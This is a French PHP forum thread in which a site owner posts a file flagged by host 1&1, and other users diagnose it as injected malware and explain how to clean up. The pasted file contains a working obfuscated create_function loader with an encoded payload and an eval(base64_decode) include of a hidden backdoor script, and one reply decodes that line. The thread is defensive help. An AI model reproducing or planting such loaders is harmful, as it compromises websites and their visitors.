Forum |  HardWare.fr | News | Articles | PC | S'identifier | S'inscrire | Shop Recherche
898 connectés 

  FORUM HardWare.fr
  Programmation
  PHP

  Fichier bloqué par 1&1, vous parait-il normal ?

 


 Mot :   Pseudo :  
 
Bas de page
Auteur Sujet :

Fichier bloqué par 1&1, vous parait-il normal ?

n°2236289
damdam51
Posté le 27-08-2014 à 10:46:14  profilanswer
 

Bonjour,
 
mon site viens d'être bloqué par 1&1 car un fichier (confserver.php) est trouvé par leur antivirus.
 
je l'ouvre et le voici :
 

Code :
  1. <?php
  2. $md5 = "eb75534cdd8ef9c23f453101cef5358d";
  3. $a4 = array("e",'z',"o","$","6"," )","t",'l',"r","n",'i',"b",'d',"f","c","s","_",";","4",'g',"(",'v','a');
  4. $b48 = create_function('$'.'v',$a4[0].$a4[21].$a4[22].$a4[7].$a4[20].$a4[19].$a4[1].$a4[10].$a4[9].$a4[13].$a4[7].$a4[22].$a4[6].$a4[0].$a4[20].$a4[11].$a4[22].$a4[15].$a4[0].$a4[4].$a4[18].$a4[16].$a4[12].$a4[0].$a4[14].$a4[2].$a4[12].$a4[0].$a4[20].$a4[3].$a4[21].$a4[5].$a4[5].$a4[5].$a4[17]);
  5. $b48('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');
  6. ?>
  7. <?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9rdW5kZW4vaG9tZXBhZ2VzLzQ0L2QyOTcwMTgzMzAvaHRkb2NzL2Zja2VkaXRvci9lZGl0b3IvZmlsZW1hbmFnZXIvYnJvd3Nlci9kZWZhdWx0L2ltYWdlcy9pY29ucy8zMi9zdHlsZS5jc3MucGhwJztpZihmaWxlX2V4aXN0cygkR0xPQkFMU1snbWZzbiddKSl7aW5jbHVkZV9vbmNlKCRHTE9CQUxTWydtZnNuJ10pO2lmKGZ1bmN0aW9uX2V4aXN0cygnZ21sJykmJmZ1bmN0aW9uX2V4aXN0cygnZGdvYmgnKSl7b2Jfc3RhcnQoJ2Rnb2JoJyk7fX20')); ?>
  8. <?
  9. $user="blabla";
  10. $password="blablabla";
  11. $localhost = "blabla.1and1.fr";
  12. $database="blabla";
  13. mysql_connect($localhost,$user,$password);
  14. @mysql_select_db($database) or die( "Unable to connect to database1" );
  15. mysql_query("SET NAMES 'utf8'" );
  16. ?>


 
Je ne suis pas expert en informatique et vous demande si quelque chose vous parait suspect dans ce fichier et mérite que mon site soit bloqué...
 
Merci

mood
Publicité
Posté le 27-08-2014 à 10:46:14  profilanswer
 

n°2236319
xaeon
Profil: TT
Posté le 27-08-2014 à 15:37:50  profilanswer
 

Fichier très certainement infecté, verifie même que ce ne soit pas le cas de plusieurs (tous) fichiers.
 
En exécutant ce code (lors d'un accès à ce fichier par le navigateur, ou même pas un include), le code sera interprété par PHP et avoir des effets  peu sympathiques: ouverture d'un accès distant sur la machine, injection de code malicieux dans une page web...
 
Dans tous les cas, pour que ce code soit ici, c'est qu'il existe une faille dans ton application (ou dans une autre application hébergée sur le même serveur).

n°2236320
rufo
Pas me confondre avec Lycos!
Posté le 27-08-2014 à 15:40:15  profilanswer
 

Le coup du eval avec un chaîne encodée en base64 me paraît bien puer du bec :/


---------------
Astres, outil de help-desk GPL : http://sourceforge.net/projects/astres, ICARE, gestion de conf : http://sourceforge.net/projects/icare, Outil Planeta Calandreta : https://framalibre.org/content/planeta-calandreta
n°2236329
Devil'sTig​er
Posté le 27-08-2014 à 17:27:27  profilanswer
 

De la ligne 1 a la ligne 8 c'est très certainement une faille de sécu qui a mis ce code, les 3/4 du temps c'est de la pub en fait qui se cache dans la page, pour gonfler les résultats google.
 
Tu as donc une faille de sécu.
 
Pour le code en base64 (ligne 7), voila ce qui contient quand tu run le base64_decode dessus:

Code :
  1. if(function_exists('ob_start')&&!isset($GLOBALS['mfsn'])){$GLOBALS['mfsn']='/kunden/homepages/44/d297018330/htdocs/fckeditor/editor/filemanager/browser/default/images/icons/32/style.css.php';if(file_exists($GLOBALS['mfsn'])){include_once($GLOBALS['mfsn']);if(function_exists('gml')&&function_exists('dgobh')){ob_start('dgobh');}}


 
Je te conseille donc vivement de checker tes fichiers (pour vérifier que d'autres fichiers n'ont pas le même soucis) + aller chercher ce fichier en particulier:
/kunden/homepages/44/d297018330/htdocs/fckeditor/editor/filemanager/browser/default/images/icons/32/style.css.php
 
Qui n'a probablement rien de bon dedans, et qui au passage t'indique probablement que la faille vient du module d'upload de fckeditor (vu le path /fckeditor/editor/filemanager il y a de bonne chances que cela vienne de là).
 
Pour rechercher si un fichier contient ou non le code malicieux, place toi la racine, fait un grep en recherchant create_function, eval, et base64.
Les deux premiers ne devraient pas être utilisés dans un code digne de ce nom en production, le dernier peut apparaitre plus facilement y compris dans du code bon.
Tu auras probablement toujours la même structure, 5/6 lignes indéchiffrables à l'oeil nue et en début de fichier, c'est souvent le cas.


Message édité par Devil'sTiger le 27-08-2014 à 17:29:10
n°2236330
TotalRecal​l
Posté le 27-08-2014 à 18:06:22  profilanswer
 

Pour info, lorsque j'ai ouvert ce topic tu as fait réagir mon propre antivirus qui m'a bloqué l'accès à la page :D.
Effectivement, il faut nettoyer maintenant, Devil'sTiger t'a donné d'excellents conseils. Mets aussi à jour ta version de fckeditor et vois si tu n'as pas un plugin avec une faille.
Tu remercieras 1&1 de t'avoir averti !...


Message édité par TotalRecall le 27-08-2014 à 18:09:26

---------------
Topic .Net - C# @ Prog
n°2236340
damdam51
Posté le 27-08-2014 à 21:20:20  profilanswer
 

Super, merci pour tous ces conseils.
En virant les 7 premières lignes, le site semble fonctionner sans soucis, donc pas indispensables (voir nuisibles !!)
Je vais scanner mes autres pages.
En tous cas, Eset ne m'a rien bloqué pour ce fichier, mais m'a alerté pour un fichier thumb.php dans phpmyvisite : menace PHP/Obfuscated.F
 
Bref, il y a du ménage à faire. Merci encore
 
Je vais chercher comment decoder ces lignes base64
 
En tous cas, le lien "/kunden/homepages/44/d297018330/htdocs/fckeditor/editor/filemanager/browser/default/images/icons/32/style.css.php" ne correspond pas à mon arbo, il n'y a que la fin qui correspond.


Message édité par damdam51 le 27-08-2014 à 21:38:16
n°2236341
Devil'sTig​er
Posté le 27-08-2014 à 21:44:26  profilanswer
 

Oui en réalité cela correspond bien à ton arbo :D
 
Sauf que sur un manager 1&1, un mutualisé en général, une partie de l'arbo est caché pour de simples raisons de sécurité (sinon tu pourrais remonter à d'autres sites d'autres personnes)
.
 
Techniquement, ton arbo doit démarrer vers:
"/kunden/homepages/44/d297018330/"
Ca c'est probablement ton root, voir le htdocs est ton root, avant (donc cette arbo), tu n'y auras pas accès c'est normal.
 
Mais, tu peux demander une lecture d'une arbo en path absolu malgré tout.
 
Créer un fichier php avec ce code dedans:

Code :
  1. <?php
  2. $file = '/kunden/homepages/44/d297018330/htdocs/fckeditor/editor/filemanager/browser/default/images/icons/32/style.css.php';
  3. if (file_exists($file)) {
  4.     header('Content-Description: File Transfer');
  5.     header('Content-Type: application/octet-stream');
  6.     header('Content-Disposition: attachment; filename='.basename($file));
  7.     header('Expires: 0');
  8.     header('Cache-Control: must-revalidate');
  9.     header('Pragma: public');
  10.     header('Content-Length: ' . filesize($file));
  11.     readfile($file);
  12.     exit;
  13. }
  14. ?>


 
Et avec ton navigateur préféré va sur cette page php toute fraiche, il devrait te proposer de téléchargé le dit fichier !
Bien sur, évite de le lancer sur ta propre machine, mais en soit, étant de l'interprété normalement tu devrais récupérer un simple fichier texte que tu pourras éditer/voir, probable qu'il soit compressé comme le reste d'ailleurs, c'est une vielle ruse pour qu'un 'humain' qui se pose pas trop de question, ait beaucoup de mal à se demander si c'est bon ou pas.


Message édité par Devil'sTiger le 27-08-2014 à 21:47:50
n°2236399
damdam51
Posté le 28-08-2014 à 12:07:32  profilanswer
 

OK merci pour ces infos et ces conseils bien clairs !
 

n°2236841
kao98
...
Posté le 02-09-2014 à 17:54:06  profilanswer
 

http://fr.wikipedia.org/wiki/PhpMyVisites
 
En bref :
- phpMyVisites n'est plus supporté / développé / est obsolète depuis bien longtemps maintenant
- tu as été victime d'une faille de phpMyVisites ... corrigée en 2009
 
En résumé :
- utilise des outils plus moderne
- et surtout : vérifie que tout tes scripts, applications, sites ... soient à jour sur ton serveur. Si tu utilise wordpress, ou d'autres choses, il faut tout mettre à jour.


---------------
Kao ..98 - Uplay (R6S) : kao98.7.62x39 - Origin (BF4, BF1) : kntkao98

Aller à :
Ajouter une réponse
  FORUM HardWare.fr
  Programmation
  PHP

  Fichier bloqué par 1&1, vous parait-il normal ?

 

Sujets relatifs
Script affichage taille fichierEcrire dans un fichier binaire
conversion de fichier .cds -> .xlsaffichage de fichier XML en JFrame (zone de texte)
Remplacer un \ avec un / dans un chemin de fichiercomment installer des clé avec un fichier .bat
Création d'un fichier de sauvegarde sous WordMangodb / Redis : Pour indexer/Chercher fichier locaux
Ajouter des paragraphe d'un fichier word vers un autreOuvrir un fichier SPK
Plus de sujets relatifs à : Fichier bloqué par 1&1, vous parait-il normal ?


Copyright © 1997-2022 Hardware.fr SARL (Signaler un contenu illicite / Données personnelles) / Groupe LDLC / Shop HFR